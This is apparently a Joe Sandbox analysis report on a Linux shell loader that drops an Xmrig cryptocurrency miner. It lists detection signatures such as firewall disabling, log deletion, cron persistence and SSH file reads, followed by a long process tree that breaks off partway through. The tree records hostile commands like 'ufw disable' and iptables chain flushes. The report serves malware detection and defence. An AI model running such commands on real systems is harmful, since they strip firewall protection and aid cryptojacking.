Loading ...

Play interactive tourEdit tour

Linux Analysis Report 28e9b_ldr.sh

Overview

General Information

Sample Name:28e9b_ldr.sh
Analysis ID:1540633
MD5:d5c0f3993bb246c7c1f643c322da444f
SHA1:c16b4ea8255035c9bbfbd97a4af4525a6a7e3eb7
SHA256:28e9b06e5a4606c9d806092a8ad78ce2ea7aa1077a08bcf3ec1d8e3d19714f08
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Yara detected Xmrig cryptocurrency miner
Deletes all firewall rules
Deletes security-related log files
Detected Stratum mining protocol
Disables Ubuntu's Uncomplicated Firewall (UFW)
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Found strings related to Crypto-Mining
Manipulation of devices in /dev
Sample deletes itself
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample reads from .bash_history
Sample tries to persist itself using cron
Tries to detect Cloud Protection Platforms agents (likely to circumvent detection)
Tries to load the MSR kernel module used for reading/writing to CPUs model specific register
Tries to read the SSH 'known_hosts' file
Tries to read the SSH config file
Uses known network protocols on non-standard ports
Writes identical ELF files to multiple locations
Writes to CPU model specific registers (MSR) (e.g. miners improve performance by disabling HW prefetcher)
Deletes log files
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "apt-get" command used for package management
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "grep" command used to find patterns in files or piped streams
Executes the "id" command, possibly to determine if the user is root or not
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "modprobe" command used for loading kernel modules
Executes the "nohup" (no hangup) command used to avoid background terminal process from being killed
Executes the "ps" command used to list the status of processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
HTTP GET or POST without a user agent
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Removes protection from files
Sample contains strings that are potentially command strings
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

Analysis Advice

Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:1540633
Start date:06.08.2021
Start time:17:35:00
Joe Sandbox Product:Cloud
Overall analysis duration:0h 7m 19s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:28e9b_ldr.sh
Cookbook file name:Linux load provided binary as argument.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:default
Detection:MAL
Classification:mal100.spre.troj.evad.mine.linSH@0/12@0/0
Warnings:
Show All
  • Excluded IPs from analysis (whitelisted): 91.189.92.41, 91.189.92.19, 91.189.92.20, 91.189.92.40, 91.189.92.38, 91.189.92.39
  • Excluded domains from analysis (whitelisted): api.snapcraft.io
  • Report size exceeded maximum capacity and may have missing network information.

Process Tree

  • system is lnxubuntu1
  • sh (PID: 2676, Parent: 2588, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh /tmp/28e9b_ldr.sh
    • sh New Fork (PID: 2677, Parent: 2676)
      • sh New Fork (PID: 2678, Parent: 2677)
      • date (PID: 2678, Parent: 2677, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
      • sh New Fork (PID: 2679, Parent: 2677)
      • md5sum (PID: 2679, Parent: 2677, MD5: 8be81254283917cbc626597bb7fb529b) Arguments: md5sum
      • sh New Fork (PID: 2680, Parent: 2677)
        • sh New Fork (PID: 2681, Parent: 2680)
        • date (PID: 2681, Parent: 2680, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date +%s
      • awk (PID: 2680, Parent: 2677, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk -v n=1628271357 "{print substr($1,1,n%7+6)}"
    • sh New Fork (PID: 2685, Parent: 2676)
    • ufw (PID: 2685, Parent: 2676, MD5: 2494de33dc6d85c4cc46c730f3a3da02) Arguments: /usr/bin/python3 /usr/sbin/ufw disable
      • ufw New Fork (PID: 2731, Parent: 2685)
      • iptables (PID: 2731, Parent: 2685, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: /sbin/iptables -V
      • ufw New Fork (PID: 2733, Parent: 2685)
      • ufw-init (PID: 2733, Parent: 2685, MD5: fd2ac93cb7335ccffed6c5fbe98c39f7) Arguments: /bin/sh /lib/ufw/ufw-init force-stop
        • ufw-init New Fork (PID: 2738, Parent: 2733)
        • ip6tables (PID: 2738, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -L INPUT -n
          • modprobe (PID: 2740, Parent: 2738, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip6_tables
        • ufw-init New Fork (PID: 2766, Parent: 2733)
        • iptables (PID: 2766, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-logging-deny
          • iptables New Fork (PID: 2771, Parent: 2766)
          • modprobe (PID: 2771, Parent: 2766, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
        • ufw-init New Fork (PID: 2792, Parent: 2733)
        • iptables (PID: 2792, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-logging-allow
        • ufw-init New Fork (PID: 2793, Parent: 2733)
        • iptables (PID: 2793, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-not-local
        • ufw-init New Fork (PID: 2797, Parent: 2733)
        • iptables (PID: 2797, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-logging-input
        • ufw-init New Fork (PID: 2802, Parent: 2733)
        • iptables (PID: 2802, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-limit-accept
        • ufw-init New Fork (PID: 2807, Parent: 2733)
        • iptables (PID: 2807, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-limit
        • ufw-init New Fork (PID: 2810, Parent: 2733)
        • iptables (PID: 2810, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-skip-to-policy-input
        • ufw-init New Fork (PID: 2815, Parent: 2733)
        • iptables (PID: 2815, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-reject-input
        • ufw-init New Fork (PID: 2819, Parent: 2733)
        • iptables (PID: 2819, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-after-logging-input
        • ufw-init New Fork (PID: 2823, Parent: 2733)
        • iptables (PID: 2823, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-after-input
        • ufw-init New Fork (PID: 2830, Parent: 2733)
        • iptables (PID: 2830, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-input
        • ufw-init New Fork (PID: 2835, Parent: 2733)
        • iptables (PID: 2835, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-before-input
        • ufw-init New Fork (PID: 2841, Parent: 2733)
        • iptables (PID: 2841, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-before-logging-input
        • ufw-init New Fork (PID: 2849, Parent: 2733)
        • iptables (PID: 2849, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-skip-to-policy-forward
        • ufw-init New Fork (PID: 2858, Parent: 2733)
        • iptables (PID: 2858, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-reject-forward
        • ufw-init New Fork (PID: 2863, Parent: 2733)
        • iptables (PID: 2863, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-after-logging-forward
        • ufw-init New Fork (PID: 2869, Parent: 2733)
        • iptables (PID: 2869, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-after-forward
        • ufw-init New Fork (PID: 2874, Parent: 2733)
        • iptables (PID: 2874, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-logging-forward
        • ufw-init New Fork (PID: 2881, Parent: 2733)
        • iptables (PID: 2881, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-forward
        • ufw-init New Fork (PID: 2887, Parent: 2733)
        • iptables (PID: 2887, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-before-forward
        • ufw-init New Fork (PID: 2897, Parent: 2733)
        • iptables (PID: 2897, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-before-logging-forward
        • ufw-init New Fork (PID: 2902, Parent: 2733)
        • iptables (PID: 2902, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-track-forward
        • ufw-init New Fork (PID: 2910, Parent: 2733)
        • iptables (PID: 2910, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-track-output
        • ufw-init New Fork (PID: 2913, Parent: 2733)
        • iptables (PID: 2913, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-track-input
        • ufw-init New Fork (PID: 2921, Parent: 2733)
        • iptables (PID: 2921, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-skip-to-policy-output
        • ufw-init New Fork (PID: 2929, Parent: 2733)
        • iptables (PID: 2929, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-reject-output
        • ufw-init New Fork (PID: 2935, Parent: 2733)
        • iptables (PID: 2935, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-after-logging-output
        • ufw-init New Fork (PID: 2944, Parent: 2733)
        • iptables (PID: 2944, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-after-output
        • ufw-init New Fork (PID: 2951, Parent: 2733)
        • iptables (PID: 2951, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-logging-output
        • ufw-init New Fork (PID: 2957, Parent: 2733)
        • iptables (PID: 2957, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-output
        • ufw-init New Fork (PID: 2963, Parent: 2733)
        • iptables (PID: 2963, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-before-output
        • ufw-init New Fork (PID: 2968, Parent: 2733)
        • iptables (PID: 2968, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-before-logging-output
        • ufw-init New Fork (PID: 2974, Parent: 2733)
        • iptables (PID: 2974, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-logging-deny
        • ufw-init New Fork (PID: 2980, Parent: 2733)
        • iptables (PID: 2980, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-logging-allow
        • ufw-init New Fork (PID: 2986, Parent: 2733)
        • iptables (PID: 2986, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-not-local
        • ufw-init New Fork (PID: 2993, Parent: 2733)
        • iptables (PID: 2993, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-logging-input
        • ufw-init New Fork (PID: 3000, Parent: 2733)
        • iptables (PID: 3000, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-limit-accept
        • ufw-init New Fork (PID: 3009, Parent: 2733)
        • iptables (PID: 3009, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-limit
        • ufw-init New Fork (PID: 3018, Parent: 2733)
        • iptables (PID: 3018, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-skip-to-policy-input
        • ufw-init New Fork (PID: 3024, Parent: 2733)
        • iptables (PID: 3024, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-reject-input
        • ufw-init New Fork (PID: 3030, Parent: 2733)
        • iptables (PID: 3030, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-after-logging-input
        • ufw-init New Fork (PID: 3037, Parent: 2733)
        • iptables (PID: 3037, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-after-input
        • ufw-init New Fork (PID: 3045, Parent: 2733)
        • iptables (PID: 3045, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-input
        • ufw-init New Fork (PID: 3050, Parent: 2733)
        • iptables (PID: 3050, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-before-input
        • ufw-init New Fork (PID: 3056, Parent: 2733)
        • iptables (PID: 3056, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-before-logging-input
        • ufw-init New Fork (PID: 3062, Parent: 2733)
        • iptables (PID: 3062, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-skip-to-policy-forward
        • ufw-init New Fork (PID: 3066, Parent: 2733)
        • iptables (PID: 3066, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-reject-forward
        • ufw-init New Fork (PID: 3071, Parent: 2733)
        • iptables (PID: 3071, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-after-logging-forward
        • ufw-init New Fork (PID: 3077, Parent: 2733)
        • iptables (PID: 3077, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-after-forward
        • ufw-init New Fork (PID: 3086, Parent: 2733)
        • iptables (PID: 3086, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-logging-forward
        • ufw-init New Fork (PID: 3092, Parent: 2733)
        • iptables (PID: 3092, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-forward
        • ufw-init New Fork (PID: 3098, Parent: 2733)
        • iptables (PID: 3098, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-before-forward
        • ufw-init New Fork (PID: 3104, Parent: 2733)
        • iptables (PID: 3104, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-before-logging-forward
        • ufw-init New Fork (PID: 3110, Parent: 2733)
        • iptables (PID: 3110, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-track-forward
        • ufw-init New Fork (PID: 3116, Parent: 2733)
        • iptables (PID: 3116, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-track-output
        • ufw-init New Fork (PID: 3123, Parent: 2733)
        • iptables (PID: 3123, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-track-input
        • ufw-init New Fork (PID: 3126, Parent: 2733)
        • iptables (PID: 3126, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-skip-to-policy-output
        • ufw-init New Fork (PID: 3130, Parent: 2733)
        • iptables (PID: 3130, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-reject-output
        • ufw-init New Fork (PID: 3135, Parent: 2733)
        • iptables (PID: 3135, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-after-logging-output
        • ufw-init New Fork (PID: 3142, Parent: 2733)
        • iptables (PID: 3142, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-after-output
        • ufw-init New Fork (PID: 3147, Parent: 2733)
        • iptables (PID: 3147, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-logging-output
        • ufw-init New Fork (PID: 3153, Parent: 2733)
        • iptables (PID: 3153, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-output
        • ufw-init New Fork (PID: 3158, Parent: 2733)
        • iptables (PID: 3158, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-before-output
        • ufw-init New Fork (PID: 3166, Parent: 2733)
        • iptables (PID: 3166, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-before-logging-output
        • ufw-init New Fork (PID: 3171, Parent: 2733)
        • iptables (PID: 3171, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-logging-deny
        • ufw-init New Fork (PID: 3176, Parent: 2733)
        • iptables (PID: 3176, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-logging-allow
        • ufw-init New Fork (PID: 3182, Parent: 2733)
        • iptables (PID: 3182, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-not-local
        • ufw-init New Fork (PID: 3188, Parent: 2733)
        • iptables (PID: 3188, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-logging-input
        • ufw-init New Fork (PID: 3195, Parent: 2733)
        • iptables (PID: 3195, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-logging-output
        • ufw-init New Fork (PID: 3200, Parent: 2733)
        • iptables (PID: 3200, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-logging-forward
        • ufw-init New Fork (PID: 3208, Parent: 2733)
        • iptables (PID: 3208, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-limit-accept
        • ufw-init New Fork (PID: 3213, Parent: 2733)
        • iptables (PID: 3213, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-limit
        • ufw-init New Fork (PID: 3219, Parent: 2733)
        • iptables (PID: 3219, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-input
        • ufw-init New Fork (PID: 3224, Parent: 2733)
        • iptables (PID: 3224, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-forward
        • ufw-init New Fork (PID: 3230, Parent: 2733)
        • iptables (PID: 3230, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-output
        • ufw-init New Fork (PID: 3236, Parent: 2733)
        • iptables (PID: 3236, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-skip-to-policy-input
        • ufw-init New Fork (PID: 3244, Parent: 2733)
        • iptables (PID: 3244, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-skip-to-policy-output
        • ufw-init New Fork (PID: 3249, Parent: 2733)
        • iptables (PID: 3249, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-skip-to-policy-forward
        • ufw-init New Fork (PID: 3254, Parent: 2733)
        • iptables (PID: 3254, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -P INPUT ACCEPT
        • ufw-init New Fork (PID: 3261, Parent: 2733)
        • iptables (PID: 3261, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -P OUTPUT ACCEPT
        • ufw-init New Fork (PID: 3266, Parent: 2733)
        • iptables (PID: 3266, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -P FORWARD ACCEPT
        • ufw-init New Fork (PID: 3273, Parent: 2733)
        • ip6tables (PID: 3273, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-logging-deny
        • ufw-init New Fork (PID: 3278, Parent: 2733)
        • ip6tables (PID: 3278, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-logging-allow
        • ufw-init New Fork (PID: 3283, Parent: 2733)
        • ip6tables (PID: 3283, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-not-local
        • ufw-init New Fork (PID: 3287, Parent: 2733)
        • ip6tables (PID: 3287, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-logging-input
        • ufw-init New Fork (PID: 3292, Parent: 2733)
        • ip6tables (PID: 3292, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-limit-accept
        • ufw-init New Fork (PID: 3300, Parent: 2733)
        • ip6tables (PID: 3300, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-limit
        • ufw-init New Fork (PID: 3307, Parent: 2733)
        • ip6tables (PID: 3307, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-skip-to-policy-input
        • ufw-init New Fork (PID: 3314, Parent: 2733)
        • ip6tables (PID: 3314, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-reject-input
        • ufw-init New Fork (PID: 3320, Parent: 2733)
        • ip6tables (PID: 3320, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-after-logging-input
        • ufw-init New Fork (PID: 3324, Parent: 2733)
        • ip6tables (PID: 3324, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-after-input
        • ufw-init New Fork (PID: 3330, Parent: 2733)
        • ip6tables (PID: 3330, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-input
        • ufw-init New Fork (PID: 3335, Parent: 2733)
        • ip6tables (PID: 3335, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-before-input
        • ufw-init New Fork (PID: 3341, Parent: 2733)
        • ip6tables (PID: 3341, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-before-logging-input
        • ufw-init New Fork (PID: 3345, Parent: 2733)
        • ip6tables (PID: 3345, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-skip-to-policy-forward
        • ufw-init New Fork (PID: 3351, Parent: 2733)
        • ip6tables (PID: 3351, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-reject-forward
        • ufw-init New Fork (PID: 3356, Parent: 2733)
        • ip6tables (PID: 3356, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-after-logging-forward
        • ufw-init New Fork (PID: 3360, Parent: 2733)
        • ip6tables (PID: 3360, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-after-forward
        • ufw-init New Fork (PID: 3365, Parent: 2733)
        • ip6tables (PID: 3365, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-logging-forward
        • ufw-init New Fork (PID: 3371, Parent: 2733)
        • ip6tables (PID: 3371, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-forward
        • ufw-init New Fork (PID: 3375, Parent: 2733)
        • ip6tables (PID: 3375, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-before-forward
        • ufw-init New Fork (PID: 3381, Parent: 2733)
        • ip6tables (PID: 3381, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-before-logging-forward
        • ufw-init New Fork (PID: 3388, Parent: 2733)
        • ip6tables (PID: 3388, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-track-forward
        • ufw-init New Fork (PID: 3398, Parent: 2733)
        • ip6tables (PID: 3398, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-track-output
        • ufw-init New Fork (PID: 3403, Parent: 2733)
        • ip6tables (PID: 3403, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-track-input
        • ufw-init New Fork (PID: 3409, Parent: 2733)
        • ip6tables (PID: 3409, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-skip-to-policy-output
        • ufw-init New Fork (PID: 3414, Parent: 2733)
        • ip6tables (PID: 3414, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-reject-output
        • ufw-init New Fork (PID: 3418, Parent: 2733)
        • ip6tables (PID: 3418, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-after-logging-output
        • ufw-init New Fork (PID: 3423, Parent: 2733)
        • ip6tables (PID: 3423, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-after-output
        • ufw-init New Fork (PID: 3427, Parent: 2733)
        • ip6tables (PID: 3427, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-logging-output
        • ufw-init New Fork (PID: 3431, Parent: 2733)
        • ip6tables (PID: 3431, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-output
        • ufw-init New Fork (PID: 3435, Parent: 2733)
        • ip6tables (PID: 3435, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-before-output
        • ufw-init New Fork (PID: 3438, Parent: 2733)
        • ip6tables (PID: 3438, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-before-logging-output
        • ufw-init New Fork (PID: 3444, Parent: 2733)
        • ip6tables (PID: 3444, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-logging-deny
        • ufw-init New Fork (PID: 3449, Parent: 2733)
        • ip6tables (PID: 3449, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-logging-allow
        • ufw-init New Fork (PID: 3455, Parent: 2733)
        • ip6tables (PID: 3455, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-not-local
        • ufw-init New Fork (PID: 3461, Parent: 2733)
        • ip6tables (PID: 3461, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-logging-input
        • ufw-init New Fork (PID: 3469, Parent: 2733)
        • ip6tables (PID: 3469, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-limit-accept
        • ufw-init New Fork (PID: 3477, Parent: 2733)
        • ip6tables (PID: 3477, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-limit
        • ufw-init New Fork (PID: 3486, Parent: 2733)
        • ip6tables (PID: 3486, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-skip-to-policy-input
        • ufw-init New Fork (PID: 3491, Parent: 2733)
        • ip6tables (PID: 3491, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-reject-input
        • ufw-init New Fork (PID: 3497, Parent: 2733)
        • ip6tables (PID: 3497, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-after-logging-input
        • ufw-init New Fork (PID: 3502, Parent: 2733)
        • ip6tables (PID: 3502, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-after-input
        • ufw-init New Fork (PID: 3507, Parent: 2733)
        • ip6tables (PID: 3507, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-input
        • ufw-init New Fork (PID: 3513, Parent: 2733)
        • ip6tables (PID: 3513, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-before-input
        • ufw-init New Fork (PID: 3521, Parent: 2733)
        • ip6tables (PID: 3521, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-before-logging-input
        • ufw-init New Fork (PID: 3527, Parent: 2733)
        • ip6tables (PID: 3527, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-skip-to-policy-forward
        • ufw-init New Fork (PID: 3532, Parent: 2733)
        • ip6tables (PID: 3532, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-reject-forward
        • ufw-init New Fork (PID: 3539, Parent: 2733)
        • ip6tables (PID: 3539, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-after-logging-forward
